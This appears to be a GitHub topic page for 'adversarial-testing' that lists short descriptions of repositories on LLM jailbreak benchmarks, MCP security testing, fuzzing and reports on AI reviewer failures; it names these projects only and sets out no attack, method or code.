Elenchus MCP Server - Adversarial verification system for code review
-
Updated
Jan 20, 2026 - TypeScript
Elenchus MCP Server - Adversarial verification system for code review
AI safety evaluation framework testing LLM epistemic robustness under adversarial self-history manipulation
Benchmark LLM jailbreak resilience across providers with standardized tests, adversarial mode, rich analytics, and a clean Web UI.
Adversarial MCP server benchmark suite for testing tool-calling security, drift detection, and proxy defenses
A multi-agent safety engineering framework that subjects systems to adversarial audit. Orchestrates specialized agents (Engineer, Psychologist, Physicist) to find process risks and human factors.
Extremely hard, multi-turn, open-source-grounded coding evaluations that reliably break every current frontier models (Claude, GPT, Grok, Gemini, Llama, etc.) on numerical stability, zero-allocation, autograd, SIMD, and long-chain correctness.
LLM-powered fuzzing and adversarial testing framework for Solana programs. Generates intelligent attack scenarios, builds real transactions, and reports vulnerabilities with CWE classifications.
A dependency-aware Bayesian belief gate that resists correlated evidence and yields only under true independent verification.
Investigation into ChatGPT-5 reviewer misalignment: PDF claimed screenshots as evidence, but assistant denied their visibility. Includes JSONL + human-readable logs, screenshots, checksums, and video. Highlights structural risks in AI reviewer reliability.
Adversarial testing and robustness evaluation for the Crucible framework
Forensic-style adversarial audit of Google Gemini 2.5 Pro revealing hidden cross-session memory. Includes structured reports, reproducible contracts, SHA-256 checksums, and video evidence of 28-day semantic recall and affective priming. Licensed under CC-BY 4.0.
Analysis of ChatGPT-5 reviewer failure: speculative reasoning disguised as certainty. Captures how evidence-only review drifted into hypotheses, later admitted as review-process failure. Includes logs, checksums, screenshots, and external video.
A governance doctrine for AI systems based on explicit oversight. Externalizes trust and uncertainty into auditable, adversarial, and constrainable layers. A design framework, not an implementation guide.
Red team toolkit for stress-testing MCP security scanners — find detection gaps before attackers do
🔒 Simulate adversarial behaviors to test and strengthen MCP defenses without real exploitation or risk, ensuring robust security evaluations.
Generate adversarial pytest tests using LLM. Tries to find edge cases in your Python code.
Independent research on ChatGPT-5 reviewer bias. Documents how the AI carried assumptions across PDF versions (v15→v16), wrongly denying evidence despite instructions. Includes JSONL logs, screenshots, checksums, and video evidence. Author: Priyanshu Kumar.
🔒 Implement a security proxy for Model Context Protocol using ensemble anomaly detection to classify requests as benign or attack for enhanced safety.
Add a description, image, and links to the adversarial-testing topic page so that developers can more easily learn about it.
To associate your repository with the adversarial-testing topic, visit your repo's landing page and select "manage topics."